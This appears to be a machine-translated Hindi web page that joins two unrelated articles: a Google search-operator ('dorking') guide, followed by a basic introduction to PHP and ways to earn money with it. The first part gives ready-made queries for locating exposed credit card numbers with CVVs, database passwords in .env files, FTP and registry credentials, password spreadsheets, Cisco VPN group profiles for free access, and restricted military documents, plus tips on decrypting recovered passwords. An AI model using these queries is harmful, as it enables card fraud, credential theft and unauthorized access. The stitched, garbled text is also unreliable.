Inurl php http क्या कमाई। PHP जानकर पैसे कैसे कमाएं? एक php प्रोग्रामर घर बैठे अच्छा पैसा कैसे कमा सकता है?

निजी डेटा प्राप्त करने का मतलब हमेशा हैकिंग नहीं होता - कभी-कभी इसे सार्वजनिक रूप से प्रकाशित किया जाता है। Google सेटिंग्स का ज्ञान और थोड़ी सी सरलता आपको क्रेडिट कार्ड नंबर से लेकर एफबीआई दस्तावेजों तक - बहुत सी दिलचस्प चीजें ढूंढने की अनुमति देगी।

चेतावनी

सभी जानकारी केवल सूचनात्मक उद्देश्यों के लिए प्रदान की गई है। इस लेख की सामग्री से होने वाले किसी भी संभावित नुकसान के लिए न तो संपादक और न ही लेखक जिम्मेदार हैं।

आज, सब कुछ इंटरनेट से जुड़ा हुआ है, पहुंच को प्रतिबंधित करने की कोई चिंता नहीं है। इसलिए, कई निजी डेटा सर्च इंजन का शिकार बन जाते हैं। स्पाइडर रोबोट अब वेब पेजों तक ही सीमित नहीं हैं, बल्कि इंटरनेट पर उपलब्ध सभी सामग्री को अनुक्रमित करते हैं और लगातार गैर-सार्वजनिक जानकारी को अपने डेटाबेस में जोड़ते हैं। इन रहस्यों का पता लगाना आसान है - आपको बस यह जानना होगा कि उनके बारे में कैसे पूछा जाए।

फ़ाइलें ढूंढ रहे हैं

सक्षम हाथों में, Google वह सब कुछ तुरंत ढूंढ लेगा जो इंटरनेट पर नहीं मिलता है, उदाहरण के लिए, व्यक्तिगत जानकारी और आधिकारिक उपयोग के लिए फ़ाइलें। वे अक्सर गलीचे के नीचे एक चाबी की तरह छिपे होते हैं: कोई वास्तविक पहुंच प्रतिबंध नहीं है, डेटा बस साइट के पीछे स्थित होता है, जहां कोई लिंक नहीं होता है। मानक Google वेब इंटरफ़ेस केवल बुनियादी उन्नत खोज सेटिंग्स प्रदान करता है, लेकिन ये भी पर्याप्त होंगे।

आप दो ऑपरेटरों का उपयोग करके अपनी Google खोज को एक विशिष्ट प्रकार की फ़ाइल तक सीमित कर सकते हैं: फ़ाइल प्रकार और ext। पहला उस प्रारूप को निर्दिष्ट करता है जिसे खोज इंजन फ़ाइल शीर्षक से निर्धारित करता है, दूसरा फ़ाइल एक्सटेंशन को निर्दिष्ट करता है, चाहे उसकी आंतरिक सामग्री कुछ भी हो। दोनों मामलों में खोज करते समय, आपको केवल एक्सटेंशन निर्दिष्ट करना होगा। प्रारंभ में, ext ऑपरेटर उन मामलों में उपयोग करने के लिए सुविधाजनक था जहां फ़ाइल में विशिष्ट प्रारूप विशेषताएँ नहीं थीं (उदाहरण के लिए, ini और cfg कॉन्फ़िगरेशन फ़ाइलों की खोज करने के लिए, जिनमें कुछ भी हो सकता है)। अब Google के एल्गोरिदम बदल गए हैं, और ऑपरेटरों के बीच कोई अंतर दिखाई नहीं देता है - ज्यादातर मामलों में परिणाम समान होते हैं।


परिणाम फ़िल्टर करना

डिफ़ॉल्ट रूप से, Google अनुक्रमित पृष्ठों पर सभी फ़ाइलों में शब्दों और सामान्यतः किसी भी दर्ज किए गए वर्णों की खोज करता है। आप खोज क्षेत्र को शीर्ष-स्तरीय डोमेन, किसी विशिष्ट साइट या फ़ाइलों में खोज अनुक्रम के स्थान के आधार पर सीमित कर सकते हैं। पहले दो विकल्पों के लिए, साइट ऑपरेटर का उपयोग करें, उसके बाद डोमेन या चयनित साइट का नाम लिखें। तीसरे मामले में, ऑपरेटरों का एक पूरा सेट आपको सेवा क्षेत्रों और मेटाडेटा में जानकारी खोजने की अनुमति देता है। उदाहरण के लिए, allinurl दिए गए लिंक को स्वयं लिंक के मुख्य भाग में पाएगा, allinannchor - टैग से सुसज्जित पाठ में , allintitle - पृष्ठ शीर्षकों में, allintext - पृष्ठों के मुख्य भाग में।

प्रत्येक ऑपरेटर के लिए छोटे नाम (सभी उपसर्ग के बिना) के साथ एक हल्का संस्करण होता है। अंतर यह है कि allinurl सभी शब्दों के साथ लिंक ढूंढेगा, और inurl केवल उनमें से पहले के साथ लिंक ढूंढेगा। क्वेरी के दूसरे और बाद के शब्द वेब पेजों पर कहीं भी दिखाई दे सकते हैं। इनयूआरएल ऑपरेटर समान अर्थ वाले दूसरे ऑपरेटर से भी भिन्न है - साइट। पहला आपको खोजे गए दस्तावेज़ के लिंक में वर्णों के किसी भी अनुक्रम को खोजने की अनुमति देता है (उदाहरण के लिए, /cgi-bin/), जिसका व्यापक रूप से ज्ञात कमजोरियों वाले घटकों को खोजने के लिए उपयोग किया जाता है।

आइए इसे व्यवहार में आज़माएँ। हम allintext फ़िल्टर लेते हैं और अनुरोध करते हुए क्रेडिट कार्ड के नंबरों और सत्यापन कोड की एक सूची तैयार करते हैं जो केवल दो वर्षों में समाप्त हो जाएंगी (या जब उनके मालिक सभी को खिलाने से थक जाएंगे)।

Allintext: कार्ड नंबर की समाप्ति तिथि /2017 सीवीवी

जब आप समाचार में पढ़ते हैं कि एक युवा हैकर ने पेंटागन या नासा के "सर्वर को हैक कर लिया", वर्गीकृत जानकारी चुरा ली, तो ज्यादातर मामलों में हम Google का उपयोग करने की ऐसी ही एक बुनियादी तकनीक के बारे में बात कर रहे हैं। मान लीजिए कि हम नासा के कर्मचारियों की सूची और उनकी संपर्क जानकारी में रुचि रखते हैं। निश्चित रूप से ऐसी सूची इलेक्ट्रॉनिक रूप में उपलब्ध है। सुविधा के लिए या निरीक्षण के कारण यह संगठन की वेबसाइट पर भी हो सकता है। यह तर्कसंगत है कि इस मामले में इसका कोई लिंक नहीं होगा, क्योंकि यह आंतरिक उपयोग के लिए है। ऐसी फ़ाइल में कौन से शब्द हो सकते हैं? कम से कम - "पता" फ़ील्ड. इन सभी धारणाओं का परीक्षण करना आसान है।


Inurl:nasa.gov फ़ाइल प्रकार:xlsx "पता"


हम नौकरशाही का उपयोग करते हैं

इस तरह की खोज एक अच्छा स्पर्श है। वास्तव में एक ठोस पकड़ वेबमास्टरों के लिए Google के ऑपरेटरों, स्वयं नेटवर्क और जो खोजा जा रहा है उसकी संरचना की विशिष्टताओं के अधिक विस्तृत ज्ञान द्वारा प्रदान किया जाता है। विवरण जानने के बाद, आप परिणामों को आसानी से फ़िल्टर कर सकते हैं और बाकी में वास्तव में मूल्यवान डेटा प्राप्त करने के लिए आवश्यक फ़ाइलों के गुणों को परिष्कृत कर सकते हैं। यह हास्यास्पद है कि नौकरशाही यहां बचाव के लिए आती है। यह मानक फॉर्मूलेशन तैयार करता है जो इंटरनेट पर गलती से लीक हुई गुप्त जानकारी की खोज के लिए सुविधाजनक है।

उदाहरण के लिए, अमेरिकी रक्षा विभाग द्वारा आवश्यक वितरण विवरण स्टाम्प का अर्थ किसी दस्तावेज़ के वितरण पर मानकीकृत प्रतिबंध है। अक्षर A सार्वजनिक रिलीज़ को दर्शाता है जिसमें कुछ भी गुप्त नहीं है; बी - केवल आंतरिक उपयोग के लिए, सी - सख्ती से गोपनीय, और इसी तरह एफ तक। अक्षर एक्स अलग से खड़ा है, जो उच्चतम स्तर के राज्य रहस्य का प्रतिनिधित्व करने वाली विशेष रूप से मूल्यवान जानकारी को चिह्नित करता है। जिन लोगों को ड्यूटी पर ऐसा करना है, उन्हें ऐसे दस्तावेजों की खोज करने दें, और हम खुद को सी अक्षर वाली फाइलों तक ही सीमित रखेंगे। DoDI के निर्देश 5230.24 के अनुसार, यह अंकन उन दस्तावेजों को सौंपा गया है जिनमें निर्यात नियंत्रण के अंतर्गत आने वाली महत्वपूर्ण प्रौद्योगिकियों का विवरण है। . आप अमेरिकी सेना के लिए आवंटित शीर्ष-स्तरीय डोमेन.मिल की साइटों पर ऐसी सावधानीपूर्वक संरक्षित जानकारी पा सकते हैं।

"वितरण विवरण सी" inurl:navy.mil

यह बहुत सुविधाजनक है कि .mil डोमेन में केवल अमेरिकी रक्षा विभाग और उसके अनुबंध संगठनों की साइटें शामिल हैं। डोमेन प्रतिबंध के साथ खोज परिणाम असाधारण रूप से साफ़ होते हैं, और शीर्षक स्वयं अपनी बात कहते हैं। इस तरह से रूसी रहस्यों की खोज करना व्यावहारिक रूप से बेकार है: डोमेन.ru और.rf में अराजकता का राज है, और कई हथियार प्रणालियों के नाम वानस्पतिक (पीपी "किपरिस", स्व-चालित बंदूकें "अकात्सिया") या यहां तक ​​​​कि शानदार ( टीओएस "बुराटिनो")।


.mil डोमेन में किसी साइट से किसी भी दस्तावेज़ का ध्यानपूर्वक अध्ययन करके, आप अपनी खोज को परिष्कृत करने के लिए अन्य मार्कर देख सकते हैं। उदाहरण के लिए, निर्यात प्रतिबंध "धारा 2751" का संदर्भ, जो दिलचस्प तकनीकी जानकारी खोजने के लिए भी सुविधाजनक है। समय-समय पर इसे उन आधिकारिक साइटों से हटा दिया जाता है जहां यह एक बार दिखाई देता था, इसलिए यदि आप खोज परिणामों में किसी दिलचस्प लिंक का अनुसरण नहीं कर सकते हैं, तो Google के कैश (कैश ऑपरेटर) या इंटरनेट आर्काइव साइट का उपयोग करें।

बादलों में चढ़ना

गलती से अवर्गीकृत किए गए सरकारी दस्तावेज़ों के अलावा, ड्रॉपबॉक्स और अन्य डेटा भंडारण सेवाओं से व्यक्तिगत फ़ाइलों के लिंक, जो सार्वजनिक रूप से प्रकाशित डेटा के लिए "निजी" लिंक बनाते हैं, कभी-कभी Google के कैश में पॉप अप हो जाते हैं। वैकल्पिक और घरेलू सेवाओं के साथ तो यह और भी बुरा है। उदाहरण के लिए, निम्न क्वेरी उन सभी वेरिज़ोन ग्राहकों के लिए डेटा ढूंढती है जिनके पास एफ़टीपी सर्वर स्थापित है और सक्रिय रूप से अपने राउटर का उपयोग कर रहे हैं।

Allinurl:ftp:// verizon.net

अब ऐसे चालीस हजार से अधिक स्मार्ट लोग हैं, और 2015 के वसंत में उनमें से कई अधिक थे। Verizon.net के स्थान पर, आप किसी भी प्रसिद्ध प्रदाता का नाम रख सकते हैं, और यह जितना अधिक प्रसिद्ध होगा, पकड़ उतनी ही बड़ी हो सकती है। अंतर्निहित एफ़टीपी सर्वर के माध्यम से, आप राउटर से जुड़े बाहरी स्टोरेज डिवाइस पर फ़ाइलें देख सकते हैं। आमतौर पर यह दूरस्थ कार्य, व्यक्तिगत क्लाउड या किसी प्रकार की पीयर-टू-पीयर फ़ाइल डाउनलोडिंग के लिए एक NAS है। ऐसे मीडिया की सभी सामग्री Google और अन्य खोज इंजनों द्वारा अनुक्रमित की जाती है, ताकि आप सीधे लिंक के माध्यम से बाहरी ड्राइव पर संग्रहीत फ़ाइलों तक पहुंच सकें।

कॉन्फ़िगरेशन को देख रहे हैं

क्लाउड पर व्यापक प्रवासन से पहले, सरल एफ़टीपी सर्वर रिमोट स्टोरेज के रूप में शासन करते थे, जिसमें बहुत सारी कमजोरियाँ भी थीं। उनमें से कई आज भी प्रासंगिक हैं। उदाहरण के लिए, लोकप्रिय WS_FTP प्रोफेशनल प्रोग्राम कॉन्फ़िगरेशन डेटा, उपयोगकर्ता खाते और पासवर्ड को ws_ftp.ini फ़ाइल में संग्रहीत करता है। इसे ढूंढना और पढ़ना आसान है, क्योंकि सभी रिकॉर्ड टेक्स्ट प्रारूप में सहेजे जाते हैं, और पासवर्ड न्यूनतम अस्पष्टता के बाद ट्रिपल डीईएस एल्गोरिदम के साथ एन्क्रिप्ट किए जाते हैं। अधिकांश संस्करणों में, केवल पहली बाइट को हटा देना ही पर्याप्त है।

WS_FTP पासवर्ड डिक्रिप्टर उपयोगिता या निःशुल्क वेब सेवा का उपयोग करके ऐसे पासवर्ड को डिक्रिप्ट करना आसान है।

जब किसी मनमानी वेबसाइट को हैक करने की बात की जाती है, तो उनका मतलब आमतौर पर सीएमएस या ई-कॉमर्स एप्लिकेशन की कॉन्फ़िगरेशन फ़ाइलों के लॉग और बैकअप से पासवर्ड प्राप्त करना होता है। यदि आप उनकी विशिष्ट संरचना जानते हैं, तो आप आसानी से कीवर्ड इंगित कर सकते हैं। ws_ftp.ini में पाई जाने वाली पंक्तियाँ अत्यंत सामान्य हैं। उदाहरण के लिए, Drupal और PrestaShop में हमेशा एक उपयोगकर्ता पहचानकर्ता (UID) और एक संबंधित पासवर्ड (pwd) होता है, और सभी जानकारी .inc एक्सटेंशन वाली फ़ाइलों में संग्रहीत होती है। आप उन्हें इस प्रकार खोज सकते हैं:

"पीडब्ल्यूडी `` "यूआईडी `` टेक्स्ट: इंक

डीबीएमएस पासवर्ड का खुलासा

SQL सर्वर की कॉन्फ़िगरेशन फ़ाइलों में, उपयोगकर्ता नाम और ईमेल पते स्पष्ट टेक्स्ट में संग्रहीत होते हैं, और पासवर्ड के बजाय उनके MD5 हैश लिखे जाते हैं। सख्ती से कहें तो, उन्हें डिक्रिप्ट करना असंभव है, लेकिन आप ज्ञात हैश-पासवर्ड जोड़े के बीच एक मैच पा सकते हैं।

अभी भी ऐसे DBMS हैं जो पासवर्ड हैशिंग का उपयोग भी नहीं करते हैं। उनमें से किसी की कॉन्फ़िगरेशन फ़ाइलें केवल ब्राउज़र में देखी जा सकती हैं।

पाठ:DB_PASSWORD फ़ाइल प्रकार:env

विंडोज़ सर्वर के आगमन के साथ, कॉन्फ़िगरेशन फ़ाइलों का स्थान आंशिक रूप से रजिस्ट्री द्वारा ले लिया गया था। आप फ़ाइल प्रकार के रूप में reg का उपयोग करके, ठीक उसी तरह इसकी शाखाओं में खोज कर सकते हैं। उदाहरण के लिए, इस तरह:

फ़ाइल प्रकार:reg HKEY_CURRENT_USER "पासवर्ड"=

आइए स्पष्ट को न भूलें

कभी-कभी गलती से खोले गए और Google के ध्यान में आए डेटा का उपयोग करके वर्गीकृत जानकारी प्राप्त करना संभव है। आदर्श विकल्प कुछ सामान्य प्रारूप में पासवर्ड की एक सूची ढूंढना है। केवल हताश लोग ही खाते की जानकारी को टेक्स्ट फ़ाइल, वर्ड दस्तावेज़ या एक्सेल स्प्रेडशीट में संग्रहीत कर सकते हैं, लेकिन उनकी संख्या हमेशा पर्याप्त होती है।

फ़ाइल प्रकार: xls inurl: पासवर्ड

एक ओर, ऐसी घटनाओं को रोकने के लिए बहुत सारे साधन हैं। htaccess में पर्याप्त पहुंच अधिकार निर्दिष्ट करना, सीएमएस को पैच करना, बाएं हाथ की स्क्रिप्ट का उपयोग न करना और अन्य छिद्रों को बंद करना आवश्यक है। इसमें robots.txt अपवादों की सूची वाली एक फ़ाइल भी है जो खोज इंजनों को इसमें निर्दिष्ट फ़ाइलों और निर्देशिकाओं को अनुक्रमित करने से रोकती है। दूसरी ओर, यदि किसी सर्वर पर robots.txt की संरचना मानक सर्वर से भिन्न है, तो यह तुरंत स्पष्ट हो जाता है कि वे इस पर क्या छिपाने की कोशिश कर रहे हैं।

किसी भी साइट पर निर्देशिकाओं और फ़ाइलों की सूची के पहले मानक सूचकांक होता है। चूँकि सेवा उद्देश्यों के लिए इसे शीर्षक में प्रदर्शित होना चाहिए, इसलिए इसकी खोज को इनटाइटल ऑपरेटर तक सीमित करना उचित है। दिलचस्प चीजें /एडमिन/, /पर्सनल/, /आदि/ और यहां तक ​​कि /सीक्रेट/ निर्देशिकाओं में भी हैं।

अपडेट के लिए बने रहें

यहां प्रासंगिकता बेहद महत्वपूर्ण है: पुरानी कमजोरियां बहुत धीरे-धीरे बंद हो जाती हैं, लेकिन Google और उसके खोज परिणाम लगातार बदल रहे हैं। यहां तक ​​कि "अंतिम सेकंड" फ़िल्टर (&tbs=qdr:s अनुरोध URL के अंत में) और "वास्तविक समय" फ़िल्टर (&tbs=qdr:1) के बीच भी अंतर है।

फ़ाइल की अंतिम अद्यतन तिथि का समय अंतराल भी Google द्वारा परोक्ष रूप से दर्शाया गया है। ग्राफ़िकल वेब इंटरफ़ेस के माध्यम से, आप मानक अवधि (घंटा, दिन, सप्ताह, आदि) में से एक का चयन कर सकते हैं या दिनांक सीमा निर्धारित कर सकते हैं, लेकिन यह विधि स्वचालन के लिए उपयुक्त नहीं है।

पता बार को देखकर, आप केवल &tbs=qdr: निर्माण का उपयोग करके परिणामों के आउटपुट को सीमित करने के तरीके के बारे में अनुमान लगा सकते हैं। इसके बाद का अक्षर y एक वर्ष की सीमा निर्धारित करता है (&tbs=qdr:y), m पिछले महीने के परिणाम दिखाता है, w - सप्ताह के लिए, d - पिछले दिन के लिए, h - अंतिम घंटे के लिए, n - मिनट के लिए, और s - मुझे एक सेकंड दें। Google द्वारा अभी-अभी ज्ञात किए गए नवीनतम परिणाम फ़िल्टर &tbs=qdr:1 का उपयोग करके पाए गए हैं।

यदि आपको एक चतुर स्क्रिप्ट लिखने की आवश्यकता है, तो यह जानना उपयोगी होगा कि दिनांक सीमा Google में daterange ऑपरेटर का उपयोग करके जूलियन प्रारूप में सेट की गई है। उदाहरण के लिए, इस प्रकार आप 1 जनवरी से 1 जुलाई 2015 तक डाउनलोड किए गए गोपनीय शब्द के साथ पीडीएफ दस्तावेज़ों की सूची पा सकते हैं।

गोपनीय फ़ाइल प्रकार: पीडीएफ तिथि सीमा: 2457024-2457205

भिन्नात्मक भाग को ध्यान में रखे बिना सीमा को जूलियन दिनांक प्रारूप में दर्शाया गया है। ग्रेगोरियन कैलेंडर से उनका मैन्युअल रूप से अनुवाद करना असुविधाजनक है। दिनांक कनवर्टर का उपयोग करना आसान है.

पुनः लक्ष्यीकरण और फ़िल्टरिंग

खोज क्वेरी में अतिरिक्त ऑपरेटरों को निर्दिष्ट करने के अलावा, उन्हें सीधे लिंक के मुख्य भाग में भेजा जा सकता है। उदाहरण के लिए, फ़ाइल प्रकार:पीडीएफ विनिर्देश as_filetype=pdf निर्माण से मेल खाता है। इससे कोई भी स्पष्टीकरण पूछना सुविधाजनक हो जाता है। मान लीजिए कि केवल होंडुरास गणराज्य से परिणामों का आउटपुट खोज URL में निर्माण cr=countryHN जोड़कर निर्दिष्ट किया जाता है, और केवल बोब्रुइस्क शहर से - gcs=Bobruisk। आप डेवलपर अनुभाग में पूरी सूची पा सकते हैं.

Google के स्वचालन उपकरण जीवन को आसान बनाने के लिए डिज़ाइन किए गए हैं, लेकिन वे अक्सर समस्याएं जोड़ते हैं। उदाहरण के लिए, उपयोगकर्ता का शहर WHOIS के माध्यम से उपयोगकर्ता के आईपी द्वारा निर्धारित किया जाता है। इस जानकारी के आधार पर, Google न केवल सर्वरों के बीच लोड को संतुलित करता है, बल्कि खोज परिणामों को भी बदलता है। क्षेत्र के आधार पर, एक ही अनुरोध के लिए, अलग-अलग परिणाम पहले पृष्ठ पर दिखाई देंगे, और उनमें से कुछ पूरी तरह से छिपे हो सकते हैं। Gl=देश निर्देश के बाद दो अक्षर का कोड आपको एक महानगरीय महसूस करने और किसी भी देश से जानकारी खोजने में मदद करेगा। उदाहरण के लिए, नीदरलैंड का कोड NL है, लेकिन वेटिकन और उत्तर कोरिया का Google में अपना कोड नहीं है।

अक्सर, कई उन्नत फ़िल्टर का उपयोग करने के बाद भी खोज परिणाम अव्यवस्थित हो जाते हैं। इस मामले में, अनुरोध में कई अपवाद शब्द जोड़कर इसे स्पष्ट करना आसान है (उनमें से प्रत्येक के सामने एक ऋण चिह्न लगाया गया है)। उदाहरण के लिए, बैंकिंग, नाम और ट्यूटोरियल का प्रयोग अक्सर पर्सनल शब्द के साथ किया जाता है। इसलिए, स्वच्छ खोज परिणाम किसी क्वेरी के पाठ्यपुस्तक उदाहरण द्वारा नहीं, बल्कि एक परिष्कृत उदाहरण द्वारा दिखाए जाएंगे:

शीर्षक:"/व्यक्तिगत/" का सूचकांक -नाम -ट्यूटोरियल -बैंकिंग

एक आखिरी उदाहरण

एक परिष्कृत हैकर की पहचान इस बात से होती है कि वह अपनी जरूरत की हर चीज खुद ही उपलब्ध कराता है। उदाहरण के लिए, वीपीएन एक सुविधाजनक चीज़ है, लेकिन या तो महंगी है, या अस्थायी है और प्रतिबंधों के साथ है। अपने लिए सदस्यता के लिए साइन अप करना बहुत महंगा है। यह अच्छा है कि समूह सदस्यताएँ हैं, और Google की सहायता से समूह का हिस्सा बनना आसान है। ऐसा करने के लिए, बस सिस्को वीपीएन कॉन्फ़िगरेशन फ़ाइल ढूंढें, जिसमें एक गैर-मानक पीसीएफ एक्सटेंशन और एक पहचानने योग्य पथ है: प्रोग्राम फ़ाइलें\सिस्को सिस्टम\वीपीएन क्लाइंट\प्रोफाइल। एक अनुरोध और आप, उदाहरण के लिए, बॉन विश्वविद्यालय की मित्रवत टीम में शामिल हो जाते हैं।

फ़ाइल प्रकार: पीसीएफ वीपीएन या समूह

जानकारी

Google पासवर्ड कॉन्फ़िगरेशन फ़ाइलें ढूंढता है, लेकिन उनमें से कई एन्क्रिप्टेड हैं या हैश से बदल दी गई हैं। यदि आप एक निश्चित लंबाई के तार देखते हैं, तो तुरंत डिक्रिप्शन सेवा की तलाश करें।

पासवर्ड एन्क्रिप्टेड संग्रहीत होते हैं, लेकिन मौरिस मैसर्ड ने पहले से ही उन्हें डिक्रिप्ट करने के लिए एक प्रोग्राम लिखा है और इसे thecampusgeeks.com के माध्यम से मुफ्त में प्रदान करता है।

Google सैकड़ों विभिन्न प्रकार के हमले और प्रवेश परीक्षण चलाता है। ऐसे कई विकल्प हैं, जो लोकप्रिय कार्यक्रमों, प्रमुख डेटाबेस प्रारूपों, PHP की कई कमजोरियों, क्लाउड्स आदि को प्रभावित करते हैं। आप जो खोज रहे हैं उसे ठीक से जानने से आपके लिए आवश्यक जानकारी (विशेष रूप से वह जानकारी जिसे आप सार्वजनिक करने का इरादा नहीं रखते) ढूंढना बहुत आसान हो जाएगा। Shodan एकमात्र ऐसा नहीं है जो दिलचस्प विचारों को फ़ीड करता है, बल्कि अनुक्रमित नेटवर्क संसाधनों का हर डेटाबेस प्रदान करता है!

लेखक से:नमस्कार दोस्तों! इस आर्टिकल में हम PHP प्रोग्रामिंग लैंग्वेज के बारे में बात करेंगे। आइए जानें कि इसका उपयोग किस लिए किया जाता है, आप इसके साथ क्या कर सकते हैं और वेबसाइट विकास के चरणों में इसका क्या स्थान है। साथ ही इस लेख में हम PHP में प्रोग्राम करने का तरीका जानकर पैसे कमाने के कई तरीकों पर गौर करेंगे।

PHP क्या है और यह किस लिए है?

PHP एक स्क्रिप्टिंग भाषा है जिसका उपयोग वेब अनुप्रयोगों के विकास में बहुत सक्रिय रूप से किया जाता है। PHP गतिशील वेबसाइटों को विकसित करने में उपयोग की जाने वाली अग्रणी भाषाओं में से एक है।

PHP एक सर्वर-साइड प्रोग्रामिंग भाषा है। इस भाषा में लिखी गई सभी स्क्रिप्ट साइट के सर्वर पर निष्पादित की जाती हैं। PHP का अध्ययन करने, वेबसाइट और स्क्रिप्ट विकसित करने और डिबग करने के लिए, निश्चित रूप से, आपको इंटरनेट पर एक वास्तविक सर्वर खरीदने की ज़रूरत नहीं है। इन उद्देश्यों के लिए, सर्वर एमुलेटर का उपयोग किया जाता है, जो प्रोग्राम के रूप में बस एक कार्यशील कंप्यूटर पर स्थापित होते हैं। और इंटरनेट (होस्टिंग) पर एक सर्वर पर तैयार वेबसाइटें और PHP स्क्रिप्ट वाले पेज रखे जाते हैं। वैसे तो लगभग सभी आधुनिक होस्टिंग PHP भाषा को सपोर्ट करती है।

वेबसाइट विकास के क्षेत्र में इस भाषा की लोकप्रियता वेब अनुप्रयोगों के विकास के लिए अंतर्निहित उपकरणों के एक बड़े सेट की उपस्थिति से निर्धारित होती है। मुख्य हैं:

POST और GET मापदंडों का स्वचालित निष्कर्षण, साथ ही वेब सर्वर पर्यावरण चर पूर्वनिर्धारित सरणियों में;

बड़ी संख्या में विभिन्न डेटाबेस प्रबंधन प्रणालियों (MySQL, MySQLi, SQLite, PostgreSQL, Oracle (OCI8), Oracle, Microsoft SQL Server, Sybase, ODBC, mSQL, IBM DB2, Cloudscape और Apache डर्बी, Informix, Ovrimos SQL, Lotus) के साथ इंटरेक्शन नोट्स, डीबी++, डीबीएम, डीबेस, डीबीएक्स, फ्रंटबेस, फाइलप्रो, इंग्रेस II, एसईएसएएम, फायरबर्ड/इंटरबेस, पैराडॉक्स फाइल एक्सेस, मैक्सडीबी, पीडीओ इंटरफेस);

HTTP हेडर का स्वचालित भेजना;

कुकीज़ और सत्रों के साथ काम करना;

स्थानीय और दूरस्थ फ़ाइलों, सॉकेट के साथ काम करना;

सर्वर पर अपलोड की गई फ़ाइलों का प्रसंस्करण;

एक्सफॉर्म के साथ काम करना।

आइए एक उदाहरण देखें जहां PHP स्क्रिप्ट पेज पर चलती है। उदाहरण के लिए, सदस्यता फॉर्म लें जिसमें आप कई साइटों पर अपना नाम और ईमेल दर्ज करते हैं। HTML और CSS फॉर्म की उपस्थिति के लिए जिम्मेदार हैं - इनपुट फ़ील्ड और बटन के रंग, होवर करने और उस पर क्लिक करने पर बटन का रंग बदलना, इत्यादि। HTML5 का उपयोग करके, आप फ़ॉर्म में दर्ज किए गए डेटा की शुद्धता की जांच कर सकते हैं - उदाहरण के लिए, ईमेल या फ़ोन फ़ील्ड सही ढंग से भरे गए हैं या नहीं।

और आपके द्वारा "सदस्यता लें" बटन पर क्लिक करने के बाद, एक PHP स्क्रिप्ट कॉल की जाती है, जो आपके द्वारा फॉर्म में दर्ज किया गया डेटा प्राप्त करती है। स्क्रिप्ट उन्हें डेटाबेस में रिकॉर्ड करती है, फॉर्म में निर्दिष्ट ईमेल पर आपकी सदस्यता की पुष्टि करने के लिए एक लिंक बनाती है और भेजती है, सदस्यता की पुष्टि की जांच करती है और आपको बाद के ईमेल भेजती है। ये सभी ऑपरेशन सर्वर पर किए जाते हैं, और यह PHP प्रोग्रामिंग भाषा का उपयोग करके किया जाता है।

वेबसाइट विकास में PHP का अनुप्रयोग

एक वेबसाइट बनाने के लिए, आपको कई चरणों से गुजरना होगा:

योजना। इस स्तर पर, हम भविष्य की साइट की योजना बना रहे हैं: हम इसे किसके लिए और क्यों बना रहे हैं, साइट पर कौन आएगा, इसे किससे भरना है, साइट पर क्या होना चाहिए, इत्यादि।

डिज़ाइन। डिज़ाइन चरण में, हम एक ग्राफ़िक संपादक में साइट पृष्ठों का स्वरूप बनाते हैं।

लेआउट। लेआउट चरण में, HTML और CSS का उपयोग करके, हम डिज़ाइन चरण में प्राप्त लेआउट से भविष्य की साइट के HTML पेज बनाते हैं।

प्रोग्रामिंग. प्रोग्रामिंग चरण में, हम साइट के साथ काम करने की प्रक्रियाओं को स्वचालित करते हैं। हम साइट के प्रशासनिक भाग (एडमिन पैनल) को प्रोग्राम करते हैं ताकि आप वेबसाइट निर्माण से पूरी तरह अपरिचित व्यक्ति के लिए भी मौजूदा पृष्ठों को जोड़ सकें, हटा सकें, संपादित कर सकें। हम प्रोग्राम करते हैं ताकि साइट पर खोज और सभी सदस्यता प्रपत्र (यदि कोई हों) काम करें। हम यह सुनिश्चित करते हैं कि नया जोड़ा गया पेज साइट पर प्रदर्शित हो, और बनाए गए पेज का लिंक स्वचालित रूप से मेनू में दिखाई दे। यदि साइट वोटिंग या सर्वेक्षण का उपयोग करती है, तो प्रोग्रामिंग चरण में यह सब भी PHP में प्रोग्राम किया जाता है।

यदि हम प्रोग्रामिंग के चरण को एक बड़ी साइट, उदाहरण के लिए, एक ऑनलाइन स्टोर पर विचार करें, तो यहां सब कुछ और भी व्यापक और अधिक दिलचस्प है। इस मामले में, हम न केवल पेज, बल्कि उत्पाद भी जोड़ते हैं - ऑनलाइन स्टोर की मुख्य सामग्री। इसके अलावा, व्यवस्थापक पैनल में आपको विभिन्न श्रेणियों में जोड़े गए उत्पादों का विवरण प्रदान करना होगा। उत्पाद को संपादित करना, उसका विवरण, मूल्य, चित्र आदि बदलना भी संभव होना चाहिए।

इसके अलावा, एक ऑनलाइन स्टोर को एक एनालिटिक्स सिस्टम की प्रोग्रामिंग की आवश्यकता होती है - ताकि आप एडमिन पैनल में देख सकें कि कितने ऑर्डर दिए गए और भुगतान किया गया, कितनी राशि के लिए, और किस उत्पाद के लिए किस श्रेणी से भुगतान किया गया, आदि। इसके अलावा, यह होना चाहिए ऐसी रिपोर्टों को विभिन्न अवधियों के लिए प्रदर्शित करना संभव हो सकेगा। ऑनलाइन स्टोर की प्रोग्रामिंग करते समय, लेखांकन और कर उद्देश्यों के लिए बिक्री रिपोर्टिंग भी अक्सर लागू की जाती है।

यही कारण है कि जिस चरण में PHP प्रोग्रामिंग भाषा का उपयोग किया जाता है वह सबसे महत्वपूर्ण, समय की दृष्टि से सबसे लंबा और वेबसाइट विकास में सबसे महंगा और अत्यधिक भुगतान वाला होता है। और एक बार जब आप समझ जाते हैं कि ऑनलाइन स्टोर को कैसे प्रोग्राम किया जाए, तो आप लगभग किसी भी जटिलता की वेबसाइट के लिए स्क्रिप्ट बनाने में सक्षम होंगे।

PHP की लोकप्रियता

PHP की लोकप्रियता इस तथ्य से प्रमाणित होती है कि इसका उपयोग उन सभी साइटों में से 83.1% द्वारा किया जाता है जहां सर्वर-साइड प्रोग्रामिंग भाषा की पहचान करना संभव था।

सभी सबसे लोकप्रिय सीएमएस जो लोकप्रियता रेटिंग में पहले स्थान पर हैं (भुगतान और मुफ्त दोनों: वर्डप्रेस, जूमला, ड्रुपल, मॉडएक्स, बिट्रिक्स। मैगेंटो, आदि) PHP प्रोग्रामिंग भाषा में लिखे गए हैं।

इसके अलावा, PHP प्रोग्रामिंग भाषा की लोकप्रियता कई बनाए गए PHP फ्रेमवर्क से प्रमाणित होती है, जैसे कि लारवेल, वाईआईआई, केकपीएचपी, स्लिम, ज़ेंड फ्रेमवर्क 2, पीएचपिक्सी, कोडइग्निटर, सिम्फनी 2 और अन्य। बड़ी संख्या में फ़ोरम और बड़े समुदाय हैं - सामान्य रूप से PHP के लिए, प्रत्येक फ़्रेमवर्क के लिए और प्रत्येक CMS के लिए अलग से।
